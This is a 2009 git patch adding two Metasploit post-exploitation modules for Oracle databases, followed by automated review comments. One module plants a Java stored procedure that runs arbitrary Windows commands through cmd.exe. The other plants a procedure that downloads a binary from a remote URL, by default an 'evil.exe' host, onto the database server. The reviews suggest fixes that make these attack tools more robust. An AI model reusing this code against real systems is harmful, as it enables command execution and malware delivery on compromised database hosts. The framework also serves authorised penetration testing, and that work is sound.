From df18371123f7aeee1a0e4ce0cfd7c6aacb2e1918 Mon Sep 17 00:00:00 2001
From: cg <>
Date: Wed, 29 Jul 2009 04:18:08 +0000
Subject: [PATCH] win32exec and win32upload modules for oracle post exploitation

git-svn-id: file:///home/svn/framework3/trunk@6920 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../oracle/post_exploitation/win32exec.rb | 87 ++++++++++++++++
 .../oracle/post_exploitation/win32upload.rb | 99 +++++++++++++++++++
 2 files changed, 186 insertions(+)
 create mode 100755 modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb
 create mode 100755 modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb

diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb
new file mode 100755
index 0000000000..d4e6b994d3
--- /dev/null
+++ b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb
@@ -0,0 +1,87 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::ORACLE
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Execute win32 OS commands',
+ 'Description' => %q{
+ This module will create a java class which enables the execution of OS commands.
+ },
+ 'Author' => [ 'MC' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision:$',
+ 'References' =>
+ [
+ [ 'URL', 'https://www.metasploit.com/users/mc' ],
+ ],
+ 'DisclosureDate' => 'Dec 7 2007'))
+
+ register_options(
+ [
+ OptString.new('CMD', [ false, 'The OS command to execute.', 'echo metasploit > %SYSTEMDRIVE%\\\\unbreakable.txt']),
+ ], self.class)
+ end
+
+ def run
+ # use oracle_sql if a java error occurs. "grant javasyspriv to "
+
+ source = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+ name = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+
+ java = "
+ create or replace and resolve java source named \"#{source}\" as
+ import java.lang.*;
+ import java.io.*;
+ public class #{source}
+ {
+ public static void execCommand (String command) throws IOException
+ {
+ Runtime.getRuntime().exec(command);
+ }
+ };
+ "
+
+ procedure = "
+ create or replace procedure #{name} (p_command in varchar2)
+ as language java
+ name '#{source}.execCommand (java.lang.String)';
+ "
+
+ exec = "begin #{name}('cmd.exe /c #{datastore['CMD']}'); end;"
+
+ drops = "drop java source #{source}"
+
+ dropp = "drop procedure #{name}"
+
+ begin
+ print_status("Creating java source '#{source}'...")
+ prepare_exec(java)
+ rescue => e
+ return
+ end
+
+ print_status("Creating procedure '#{name}'...")
+ prepare_exec(procedure)
+
+ print_status("Sending command: '#{datastore['CMD']}'")
+ prepare_exec(exec)
+
+ print_status("Removing java source '#{source}'...")
+ prepare_exec(drops)
+
+ print_status("Removing procedure '#{name}'...")
+ prepare_exec(dropp)
+
+ end
+
+end
diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb
new file mode 100755
index 0000000000..1425b71a9d
--- /dev/null
+++ b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb
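Review bot: The `rescue => e` / `return` around the first prepare_exec call in `run` discards the exception without reporting it, so when the java source cannot be created (the comment just above hints at a missing privilege grant) the module exits and the operator sees nothing; `e` is also never read. Suggest `print_error("Failed to create java source '#{source}': #{e}")` before the `return`; the identical block in win32upload.rb has the same problem. The cleanup statements `drops`/`dropp` only run when every earlier prepare_exec succeeds, so a failure while creating the procedure or running `exec` presumably leaves the helper java source and procedure behind in the database — wrapping the tail of `run` in `begin`/`ensure` would cover that. Also `exec` interpolates `datastore['CMD']` straight into a PL/SQL string literal, so a CMD value containing a single quote produces an invalid block; escaping `'` as `''` (or rejecting it in a check at the top of `run`) would make the failure explicit.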
@@ -0,0 +1,99 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::ORACLE
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Execute win32 OS commands',
+ 'Description' => %q{
+ This module will create a java class which enables the download of a binary from a webserver to the oracle filesystem.
+ },
+ 'Author' => [ 'CG' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision:$',
+ 'References' =>
+ [
+ [ 'URL', 'http://www.argeniss.com/research/oraclesqlinj.zip' ],
+ ],
+ 'DisclosureDate' => 'Feb 2003'))
+
+ register_options(
+ [
+ OptString.new('URL', [ false, 'The URL to download the binary from.', 'http://www.meh.com/evil.exe']),
+ OptString.new('COPYTO', [ false, 'Location to copy the binary to', 'c:\\meh.exe']),
+ ], self.class)
+ end
+
+ def run
+ # use oracle_sql if a java error occurs. "grant javasyspriv to "
+
+ #source = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+ #name = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+ #create or replace and resolve java source named \"#{source}\" as
+
+ java = "
+ CREATE OR REPLACE JAVA SOURCE NAMED SRC_FILE_UPLOAD AS
+ import java.lang.*;
+ import java.io.*;
+ public class FileUpload
+ {
+ public static void fileUpload(String myFile, String url) throws IOException
+ {
+ File binaryFile = new File(myFile);
+ FileOutputStream outStream = new FileOutputStream(binaryFile);
+ java.net.URL u = new java.net.URL(url);
+ java.net.URLConnection uc = u.openConnection();
+ InputStream is = (InputStream)uc.getInputStream();
+ BufferedReader in = new BufferedReader (new InputStreamReader (is));
+ byte buffer[] = new byte[1024];
+ int length = -1;
+ while ((length = is.read(buffer)) != -1) {
+ outStream.write(buffer, 0, length);
+ outStream.flush(); }
+ is.close(); outStream.close();
+ } };;
+ "
+
+ procedure = "
+ CREATE OR REPLACE PROCEDURE PROC_FILEUPLOAD (p_file varchar2, p_url varchar2)
+ as language java
+ NAME 'FileUpload.fileUpload (java.lang.String, java.lang.String)';
+ "
+
+ exec = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO']}', '#{datastore['URL']}'); end;"
+
+ drops = "drop java source SRC_FILE_UPLOAD"
+
+ dropp = "drop procedure PROC_FILEUPLOAD"
+
+ begin
+ print_status("Creating java source 'SRC_FILE_UPLOAD'...")
+ prepare_exec(java)
+ rescue => e
+ return
+ end
+
+ print_status("Creating procedure 'PROC_FILEUPLOAD'...")
+ prepare_exec(procedure)
+
+ print_status("Trying to download binary from #{datastore['URL']} to #{datastore['COPYTO']}")
+ prepare_exec(exec)
+
+ print_status("Removing java source 'SRC_FILE_UPLOAD'...")
+ prepare_exec(drops)
+
+ print_status("Removing procedure 'PROC_FILEUPLOAD'...")
+ prepare_exec(dropp)
+
+ end
+
+end
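Review bot: `'Name' => 'Execute win32 OS commands'` in `initialize` is copied from win32exec.rb and does not describe this module, whose procedure fetches a file from `URL` and writes it to `COPYTO`; suggest `'Name' => 'Download a binary to the Oracle host filesystem'` so module listings can tell the two apart. The commented-out `#source`, `#name` and `#create or replace and resolve java source ...` lines in `run` are leftovers from the win32exec template and should be deleted rather than shipped. In the embedded Java source, `BufferedReader in = new BufferedReader (new InputStreamReader (is));` is never used or closed and can be dropped, and `} };;` carries a stray semicolon after the class. `'DisclosureDate' => 'Feb 2003'` also differs in form from the sibling module's `'Dec 7 2007'`; if the framework parses this field a full date would be safer, though I cannot confirm that from this patch alone.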